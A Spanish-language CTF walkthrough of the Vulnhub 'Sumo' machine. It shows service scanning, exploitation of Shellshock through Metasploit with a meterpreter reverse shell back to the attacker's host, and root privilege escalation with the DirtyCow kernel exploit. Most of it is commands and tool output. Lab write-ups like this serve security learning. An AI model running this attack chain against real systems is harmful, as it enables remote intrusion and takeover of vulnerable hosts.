Máquina Sumo (Vulnhub Fácil)
❗
Advertencia: Este contenido está destinado exclusivamente a fines educativos y éticos. El uso indebido de las herramientas y técnicas aquí presentadas puede ser ilegal y perjudicial. Se recomienda encarecidamente actuar con responsabilidad y respetar todas las leyes y regulaciones aplicables.
💡
Este write-up ha sido completado de manera exitosa sin recurrir a write-ups ajenos. Para llevar a cabo este análisis, se consultaron fuentes abiertas y scripts sobre vulnerabilidades, asegurando así la originalidad y autenticidad del trabajo. Además, se utilizó LLM (IA) únicamente para este párrafo 😂
Fase de escaneo
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 17:41 WEST
Nmap scan report for 10.0.2.15
Host is up (0.000091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 08:00:27:1E:DF:E2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.13 seconds
Tenemos abiertos el puerto 22 y el 80, vamos a hacer una visita a la página.
No parece ofrecer nada del otro mundo, vamos a probar dirb y gobuster
Dirb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jul 7 18:04:29 2025
URL_BASE: http://10.0.2.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.docx,.xlsx,.pptx,.pdf,.jpg.jpeg,.png,.gif,.zip,.html,) | (.txt)(.docx)(.xlsx)(.pptx)(.pdf)(.jpg.jpeg)(.png)(.gif)(.zip)(.html) [NUM = 10]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.15/ ----
+ http://10.0.2.15/index.html (CODE:200|SIZE:177)
-----------------
END_TIME: Mon Jul 7 18:04:48 2025
DOWNLOADED: 46120 - FOUND: 1
No parece aportar ninguna información útil en cuanto a extensiones más comunes.
Probemos, sin ninguna extensión, solo un recorrido en busca de directorios o archivos más comunes aparte del index.html que ya conocemos
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jul 7 18:09:26 2025
URL_BASE: http://10.0.2.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.15/ ----
+ http://10.0.2.15/cgi-bin/ (CODE:403|SIZE:285)
+ http://10.0.2.15/index (CODE:200|SIZE:177)
+ http://10.0.2.15/index.html (CODE:200|SIZE:177)
+ http://10.0.2.15/server-status (CODE:403|SIZE:290)
-----------------
END_TIME: Mon Jul 7 18:09:28 2025
DOWNLOADED: 4612 - FOUND: 4
Aquí tenemos alguna cosa que mirar. Empecemos:
http://10.0.2.15/cgi-bin/(CODE:403|SIZE:285)
Forbidden
You don't have permission to access /cgi-bin/ on this server.
Apache/2.2.22 (Ubuntu) Server at 10.0.2.15 Port 80http://10.0.2.15/index(CODE:200|SIZE:177)http://10.0.2.15/index.html(CODE:200|SIZE:177)
Index e index.html pueden contener algo de interés
http://10.0.2.15/server-status(CODE:403|SIZE:290)cgi-bin
Forbidden
You don't have permission to access /server-status/ on this server.
Apache/2.2.22 (Ubuntu) Server at 10.0.2.15 Port 80Nikto
Realizamos un escaneo con nikto (tenemos un cgi-bin) vamos a mirarlo bien
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.15
+ Target Hostname: 10.0.2.15
+ Target Port: 80
+ Start Time: 2025-07-18 21:30:40 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 18:55:10 2020. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /cgi-bin/test: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
+ /cgi-bin/test.sh: Uncommon header '93e4r0-cve-2014-6278' found, with contents: true.
+ /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
+ /cgi-bin/test/test.cgi: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8909 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2025-07-18 21:31:00 (GMT1) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Bueno, tenemos una más que aparente vulnerabilidad que podemos explotar
/cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability.
CVE -
CVE-2014-6271
The mission of the CVE™ Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.
Metasploit
Ahora en metasploit vamos a buscar la vulnerabilidad
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.4.69-dev ]
+ -- --=[ 2529 exploits - 1302 auxiliary - 432 post ]
+ -- --=[ 1672 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2 \_ target: Linux x86 . . . .
3 \_ target: Linux x86_64 . . . .
4 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
5 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
6 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
7 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
8 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
9 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
10 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
11 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
12 \_ target: Linux x86 . . . .
13 \_ target: Linux x86_64 . . . .
14 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
15 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
Fase de explotación
Vamos a intentar explotar esta vulnerabilidad que tiene alta puntuación y nos facilita a través de inyección de código en las variables de entorno a través de mod_cgi el acceso al sistema
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts 10.0.2.15
rhosts => 10.0.2.15
set targeturi /cgi-bin/test.sh
targeturi => /cgi-bin/test.sh
Mostramos como queda el show options
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 10.0.2.15 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /cgi-bin/test.sh yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
Arrancamos el exploit, esperamos el resultado y comprobamos que sistema estamos usando con sysinfo
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.0.2.5:4444
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.0.2.15
[*] Meterpreter session 2 opened (10.0.2.5:4444 -> 10.0.2.15:41273) at 2025-07-19 16:57:20 +0100
meterpreter > sysinfo
Computer : 10.0.2.15
OS : Ubuntu 12.04 (Linux 3.2.0-23-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
Una vez hemos accedido comprobamos que el directorio donde nos encontramos carece de permisos, vamos a buscar algún directorio con permisos.
pwd
/usr/lib/cgi-bin
cd /
ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
selinux
srv
sys
tmp
usr
var
vmlinuz
ls -l
total 80
drwxr-xr-x 2 root root 4096 May 11 2020 bin
drwxr-xr-x 3 root root 4096 May 11 2020 boot
drwxr-xr-x 14 root root 4020 Jul 18 13:04 dev
drwxr-xr-x 83 root root 4096 Jul 18 13:04 etc
drwxr-xr-x 3 root root 4096 May 11 2020 home
lrwxrwxrwx 1 root root 33 May 11 2020 initrd.img -> /boot/initrd.img-3.2.0-23-generic
drwxr-xr-x 18 root root 4096 May 11 2020 lib
drwxr-xr-x 2 root root 4096 May 11 2020 lib64
drwx------ 2 root root 16384 May 11 2020 lost+found
drwxr-xr-x 4 root root 4096 May 11 2020 media
drwxr-xr-x 3 root root 4096 May 11 2020 mnt
drwxr-xr-x 2 root root 4096 May 11 2020 opt
dr-xr-xr-x 106 root root 0 Jul 18 13:04 proc
drwx------ 3 root root 4096 May 13 2020 root
drwxr-xr-x 14 root root 520 Jul 18 13:04 run
drwxr-xr-x 2 root root 4096 May 11 2020 sbin
drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux
drwxr-xr-x 2 root root 4096 May 11 2020 srv
drwxr-xr-x 13 root root 0 Jul 18 13:04 sys
drwxrwxrwt 2 root root 4096 Jul 18 19:45 tmp
drwxr-xr-x 10 root root 4096 May 11 2020 usr
drwxr-xr-x 12 root root 4096 May 13 2020 var
lrwxrwxrwx 1 root root 29 May 11 2020 vmlinuz -> boot/vmlinuz-3.2.0-23-generic
He de decir que fuí directorio por directorio, mirando el contenido y permisos. Y entonces...
ls -l tmp
total 92
-rwxrwxrwx 1 www-data www-data 207 Jul 18 19:45 NTmyM
-rwxrwxrwx 1 www-data www-data 207 Jul 18 14:21 PJIPQ
-rwxrwxrwx 1 www-data www-data 207 Jul 18 19:16 PxdJV
-rwxrwxrwx 1 www-data www-data 207 Jul 18 19:05 RWUAI
-rwxr-xr-x 1 www-data www-data 42824 Jul 18 18:39 bak
Ninguno de estos archivos contiene nada útil, pero sí que encontrándonos aquí podemos utilizar alguna utilidad que nos facilite información sobre las vulnerabilidades desde dentro.
Linpeas.sh
Unas de las herramientas que más me gusta cuando tengo acceso a escritura, lectura y ejecución es ejecutar este script que te cuenta cada vulnerabilidad analizando el sistema desde dentro
Lo primero fue descargarlo en kali y guardarlo en un archivo para subirlo posteriormente a nuestro directorio vulnerable
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 933k 100 933k 0 0 920k 0 0:00:01 0:00:01 --:--:-- 920k
lo subimos desde meterpreter a nuestro directorio.
meterpreter > upload linpeas.sh /tmp
[*] Uploading : /home/kali/linpeas.sh -> /tmp/linpeas.sh
[*] Completed : /home/kali/linpeas.sh -> /tmp/linpeas.sh
Vamos a comprobar que tenemos en /tmp/
meterpreter > ls
Listing: /tmp
=============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 207 fil 2025-07-19 03:45:47 +0100 NTmyM
100777/rwxrwxrwx 207 fil 2025-07-18 22:21:51 +0100 PJIPQ
100777/rwxrwxrwx 207 fil 2025-07-19 03:16:49 +0100 PxdJV
100777/rwxrwxrwx 207 fil 2025-07-19 03:05:09 +0100 RWUAI
100755/rwxr-xr-x 42824 fil 2025-07-19 02:39:37 +0100 bak
100755/rwxr-xr-x 956174 fil 2025-07-19 03:57:28 +0100 linpeas.sh
Le damos permisos de ejecución y vamos a ejecutarlo...
cd /tmp
chmod +rwx linpeas.sh
ls -l
total 1028
-rw-r--r-- 1 www-data www-data 5442 Jul 18 16:57 34839.py
-rwxrwxrwx 1 www-data www-data 207 Jul 18 19:45 NTmyM
-rwxrwxrwx 1 www-data www-data 207 Jul 18 14:21 PJIPQ
-rwxrwxrwx 1 www-data www-data 207 Jul 18 19:16 PxdJV
-rwxrwxrwx 1 www-data www-data 207 Jul 18 19:05 RWUAI
-rwxr-xr-x 1 www-data www-data 42824 Jul 18 18:39 bak
-rwxr-xr-x 1 www-data www-data 13782 Jul 18 18:39 c0w
-rw-r--r-- 1 www-data www-data 4388 Jul 18 18:39 c0w.c
-rwxr-xr-x 1 www-data www-data 956174 Jul 18 19:57 linpeas.sh
La cantidad de vulnerabilidades es abismal... (lógico es un laboratorio de vulnerabilidades), vamos a investigar la primera
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
VulnerabilityDetails
Dirty COW. Contribute to dirtycow/dirtycow.github.io development by creating an account on GitHub.
dirtycow
Ejecución de c0w.c
Súbelo con meterpreter
meterpreter > upload c0w.c /tmp
[*] Uploading : /home/kali/c0w.c -> /tmp/c0w.c
[*] Completed : /home/kali/c0w.c -> /tmp/c0w.c
Entra a la shell y ejecuta
gcc -pthread dirtyc0w.c -o dirtyc0w
c0w.c: In function 'main':
c0w.c:110:3: warning: format '%x' expects argument of type 'unsigned int', but argument 2 has type 'void *' [-Wformat]
./c0w
(___)
(o o)_____/
@@ ` \
\ ____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 31d2e000
ptrace 0
(___)
(o o)_____/
@@ ` \
\ ____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 31d2e000
¡Parece que hemos escalado privilegios correctamente, ejecutamos /usr/bin/passwd y VOILA!
/usr/bin/passwd
cd /root
ls
root.txt
cat root.txt
{Sum0-SunCSR-2020_r001}
whoami
root
Member discussion